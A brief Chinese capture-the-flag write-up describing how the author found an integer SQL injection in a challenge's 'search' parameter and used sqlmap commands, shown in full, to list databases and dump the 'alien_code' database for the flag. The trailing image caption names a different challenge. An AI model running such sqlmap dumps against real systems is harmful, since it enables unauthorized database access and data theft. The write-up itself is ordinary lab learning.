sql注入,信息搜集
打开之后大脑一片空白,不知道入手点在哪,信息什么都查不到,最后抓包抓到了东西
发现抓包的时候出现了两个参数,直接在网页上访问一下
发现爆装备了,在这里我卡了挺久的,最后是看其他师傅的wp发现这里是sql注入,就是一个最基础的整形注入,
确定了之后我们直接上sqlmap
python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia --dbs
爆出库名
python sqlmap.py -u http://02cf228b-5b04-4c11-8620-7c88de0db19e.node5.buuoj.cn:81/query?search=amazonis_planitia -D alien_code --all
爆出数据
得到flag
![[SUCTF 2018]GetShell 1](https://img2024.cnblogs.com/blog/3335050/202407/3335050-20240715134528451-1789385396.png)
